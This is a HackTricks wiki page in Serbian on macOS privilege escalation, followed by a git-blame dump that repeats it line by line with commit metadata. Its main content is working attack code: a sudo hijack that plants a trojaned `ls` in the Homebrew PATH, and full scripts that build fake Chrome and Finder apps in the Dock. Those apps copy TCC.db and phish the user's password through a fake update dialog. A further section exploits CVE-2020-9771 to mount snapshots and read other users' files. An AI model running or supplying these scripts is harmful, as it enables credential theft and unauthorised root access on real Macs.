hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md

# macOS Privilege Escalation

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## TCC Privilege Escalation

Ako ste došli ovde tražeći TCC eskalaciju privilegija, idite na:

{% content-ref url="macos-security-protections/macos-tcc/" %}
[macos-tcc](macos-security-protections/macos-tcc/)
{% endcontent-ref %}

## Linux Privesc

Imajte na umu da **većina trikova o eskalaciji privilegija koji utiču na Linux/Unix će takođe uticati na MacOS** mašine. Tako da pogledajte:

{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}

## User Interaction

### Sudo Hijacking

Možete pronaći originalnu [Sudo Hijacking tehniku unutar posta o Linux eskalaciji privilegija](../../linux-hardening/privilege-escalation/#sudo-hijacking).

Međutim, macOS **održava** korisnikov **`PATH`** kada izvršava **`sudo`**. Što znači da bi drugi način za postizanje ovog napada bio da se **otmu drugi binarni fajlovi** koje žrtva još uvek izvršava kada **pokreće sudo:**
```bash
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls

# victim
sudo ls
```
Napomena da korisnik koji koristi terminal verovatno ima **Homebrew instaliran**. Tako da je moguće preuzeti binarne datoteke u **`/opt/homebrew/bin`**.

### Imitacija Dock-a

Korišćenjem nekih **socijalnih inženjeringa** mogli biste **imitirati na primer Google Chrome** unutar dock-a i zapravo izvršiti svoj skript:

{% tabs %}
{% tab title="Imitacija Chrome-a" %}
Neki predlozi:

* Proverite u Dock-u da li postoji Chrome, i u tom slučaju **uklonite** tu stavku i **dodajte** **lažnu** **Chrome stavku na istu poziciju** u Dock nizu.&#x20;
```bash
#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}

{% tab title="Finder Impersonacija" %}
Neki predlozi:

* Ne **možete ukloniti Finder iz Dock-a**, pa ako planirate da ga dodate u Dock, možete staviti lažni Finder odmah pored pravog. Za to treba da **dodate lažni Finder unos na početak Dock niza**.
* Druga opcija je da ga ne stavljate u Dock i samo ga otvorite, "Finder traži da kontroliše Finder" nije tako čudno.
* Još jedna opcija za **eskalaciju na root bez traženja** lozinke sa užasnom porukom, je da naterate Findera da stvarno traži lozinku za obavljanje privilegovane akcije:
* Zatražite od Findera da kopira u **`/etc/pam.d`** novu **`sudo`** datoteku (Poruka koja traži lozinku će ukazati da "Finder želi da kopira sudo")
* Zatražite od Findera da kopira novi **Authorization Plugin** (Možete kontrolisati ime datoteke tako da poruka koja traži lozinku ukazuje da "Finder želi da kopira Finder.bundle")
```bash
#!/bin/sh

# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';

rm -rf /tmp/Finder.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources

# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c

chmod +x /tmp/Finder.app/Contents/MacOS/Finder

# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}
{% endtabs %}

## TCC - Eskalacija privilegija za root

### CVE-2020-9771 - mount\_apfs TCC zaobilaženje i eskalacija privilegija

**Bilo koji korisnik** (čak i oni bez privilegija) može kreirati i montirati snapshot vremenske mašine i **pristupiti SVIM datotekama** tog snapshot-a.\
**Jedina privilegija** koja je potrebna je da aplikacija koja se koristi (kao što je `Terminal`) ima **Pristup celom disku** (FDA) (`kTCCServiceSystemPolicyAllfiles`) koji mora odobriti administrator. 

{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work
```
{% endcode %}

Detaljnije objašnjenje može se [**pronaći u originalnom izveštaju**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**

## Osetljive informacije

Ovo može biti korisno za eskalaciju privilegija:

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
{% endcontent-ref %}

{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Podrška HackTricks</summary>

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
{% endhint %}
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`# macOS Privilege Escalation`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`<details>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-04 09:09:21 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`{% endhint %}`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`## TCC Privilege Escalation`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`Ako ste došli ovde tražeći TCC eskalaciju privilegija, idite na:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% content-ref url="macos-security-protections/macos-tcc/" %}`
			`[macos-tcc](macos-security-protections/macos-tcc/)`
			`{% endcontent-ref %}`

			`## Linux Privesc`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`Imajte na umu da većina trikova o eskalaciji privilegija koji utiču na Linux/Unix će takođe uticati na MacOS mašine. Tako da pogledajte:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% content-ref url="../../linux-hardening/privilege-escalation/" %}`
			`[privilege-escalation](../../linux-hardening/privilege-escalation/)`
			`{% endcontent-ref %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`## User Interaction`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`### Sudo Hijacking`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`Možete pronaći originalnu [Sudo Hijacking tehniku unutar posta o Linux eskalaciji privilegija](../../linux-hardening/privilege-escalation/#sudo-hijacking).`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			Međutim, macOS održava korisnikov `PATH` kada izvršava `sudo`. Što znači da bi drugi način za postizanje ovog napada bio da se otmu drugi binarni fajlovi koje žrtva još uvek izvršava kada pokreće sudo:
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			```bash
			`# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH`
			`cat > /opt/homebrew/bin/ls <<EOF`
			`#!/bin/bash`
			`if [ "\$(id -u)" -eq 0 ]; then`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`whoami > /tmp/privesc`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`fi`
			`/bin/ls "\$@"`
			`EOF`
			`chmod +x /opt/homebrew/bin/ls`

			`# victim`
			`sudo ls`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			Napomena da korisnik koji koristi terminal verovatno ima Homebrew instaliran. Tako da je moguće preuzeti binarne datoteke u `/opt/homebrew/bin`.
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`### Imitacija Dock-a`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`Korišćenjem nekih socijalnih inženjeringa mogli biste imitirati na primer Google Chrome unutar dock-a i zapravo izvršiti svoj skript:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% tabs %}`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`{% tab title="Imitacija Chrome-a" %}`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Neki predlozi:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`* Proverite u Dock-u da li postoji Chrome, i u tom slučaju uklonite tu stavku i dodajte lažnu Chrome stavku na istu poziciju u Dock nizu. `
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			```bash
			`#!/bin/sh`

			`# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)`
			`# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';`

			`rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null`

			`# Create App structure`
			`mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS`
			`mkdir -p /tmp/Google\ Chrome.app/Contents/Resources`

			`# Payload to execute`
			`cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF`
			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main() {`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`char *cmd = "open /Applications/Google\\\\ Chrome.app & "`
			`"sleep 2; "`
			`"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "`
			`"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "`
			`"echo \$PASSWORD > /tmp/passwd.txt";`
			`system(cmd);`
			`return 0;`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`}`
			`EOF`

			`gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome`
			`rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c`

			`chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome`

			`# Info.plist`
			`cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"`
			`"http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`<key>CFBundleExecutable</key>`
			`<string>Google Chrome</string>`
			`<key>CFBundleIdentifier</key>`
			`<string>com.google.Chrome</string>`
			`<key>CFBundleName</key>`
			`<string>Google Chrome</string>`
			`<key>CFBundleVersion</key>`
			`<string>1.0</string>`
			`<key>CFBundleShortVersionString</key>`
			`<string>1.0</string>`
			`<key>CFBundleInfoDictionaryVersion</key>`
			`<string>6.0</string>`
			`<key>CFBundlePackageType</key>`
			`<string>APPL</string>`
			`<key>CFBundleIconFile</key>`
			`<string>app</string>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`</dict>`
			`</plist>`
			`EOF`

			`# Copy icon from Google Chrome`
			`cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns`

			`# Add to Dock`
			`defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'`
			`sleep 0.1`
			`killall Dock`
			```
			`{% endtab %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`{% tab title="Finder Impersonacija" %}`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Neki predlozi:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`* Ne možete ukloniti Finder iz Dock-a, pa ako planirate da ga dodate u Dock, možete staviti lažni Finder odmah pored pravog. Za to treba da dodate lažni Finder unos na početak Dock niza.`
			`* Druga opcija je da ga ne stavljate u Dock i samo ga otvorite, "Finder traži da kontroliše Finder" nije tako čudno.`
			`* Još jedna opcija za eskalaciju na root bez traženja lozinke sa užasnom porukom, je da naterate Findera da stvarno traži lozinku za obavljanje privilegovane akcije:`
			* Zatražite od Findera da kopira u `/etc/pam.d` novu `sudo` datoteku (Poruka koja traži lozinku će ukazati da "Finder želi da kopira sudo")
			`* Zatražite od Findera da kopira novi Authorization Plugin (Možete kontrolisati ime datoteke tako da poruka koja traži lozinku ukazuje da "Finder želi da kopira Finder.bundle")`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			```bash
			`#!/bin/sh`

			`# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)`
			`# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';`

			`rm -rf /tmp/Finder.app/ 2>/dev/null`

			`# Create App structure`
			`mkdir -p /tmp/Finder.app/Contents/MacOS`
			`mkdir -p /tmp/Finder.app/Contents/Resources`

			`# Payload to execute`
			`cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF`
			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main() {`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`char *cmd = "open /System/Library/CoreServices/Finder.app & "`
			`"sleep 2; "`
			`"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "`
			`"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "`
			`"echo \$PASSWORD > /tmp/passwd.txt";`
			`system(cmd);`
			`return 0;`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`}`
			`EOF`

			`gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder`
			`rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c`

			`chmod +x /tmp/Finder.app/Contents/MacOS/Finder`

			`# Info.plist`
			`cat << EOF > /tmp/Finder.app/Contents/Info.plist`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"`
			`"http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`<key>CFBundleExecutable</key>`
			`<string>Finder</string>`
			`<key>CFBundleIdentifier</key>`
			`<string>com.apple.finder</string>`
			`<key>CFBundleName</key>`
			`<string>Finder</string>`
			`<key>CFBundleVersion</key>`
			`<string>1.0</string>`
			`<key>CFBundleShortVersionString</key>`
			`<string>1.0</string>`
			`<key>CFBundleInfoDictionaryVersion</key>`
			`<string>6.0</string>`
			`<key>CFBundlePackageType</key>`
			`<string>APPL</string>`
			`<key>CFBundleIconFile</key>`
			`<string>app</string>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`</dict>`
			`</plist>`
			`EOF`

			`# Copy icon from Finder`
			`cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns`

			`# Add to Dock`
			`defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'`
			`sleep 0.1`
			`killall Dock`
			```
			`{% endtab %}`
			`{% endtabs %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`## TCC - Eskalacija privilegija za root`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### CVE-2020-9771 - mount\_apfs TCC zaobilaženje i eskalacija privilegija`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`Bilo koji korisnik (čak i oni bez privilegija) može kreirati i montirati snapshot vremenske mašine i pristupiti SVIM datotekama tog snapshot-a.\`
			Jedina privilegija koja je potrebna je da aplikacija koja se koristi (kao što je `Terminal`) ima Pristup celom disku (FDA) (`kTCCServiceSystemPolicyAllfiles`) koji mora odobriti administrator.
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% code overflow="wrap" %}`
			```bash
			`# Create snapshot`
			`tmutil localsnapshot`

			`# List snapshots`
			`tmutil listlocalsnapshots /`
			`Snapshots for disk /:`
			`com.apple.TimeMachine.2023-05-29-001751.local`

			`# Generate folder to mount it`
			`cd /tmp # I didn it from this folder`
			`mkdir /tmp/snap`

			`# Mount it, "noowners" will mount the folder so the current user can access everything`
			`/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap`

			`# Access it`
			`ls /tmp/snap/Users/admin_user # This will work`
			```
			`{% endcode %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`Detaljnije objašnjenje može se [pronaći u originalnom izveštaju](https://theevilbit.github.io/posts/cve\_2020\_9771/).`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`## Osetljive informacije`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Ovo može biti korisno za eskalaciju privilegija:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}`
			`[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)`
			`{% endcontent-ref %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`{% hint style="success" %}`
			`Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`<details>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`<summary>Podrška HackTricks</summary>`
arte 2024-01-04 09:09:21 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00			`* Proverite [planove pretplate](https://github.com/sponsors/carlospolop)!`
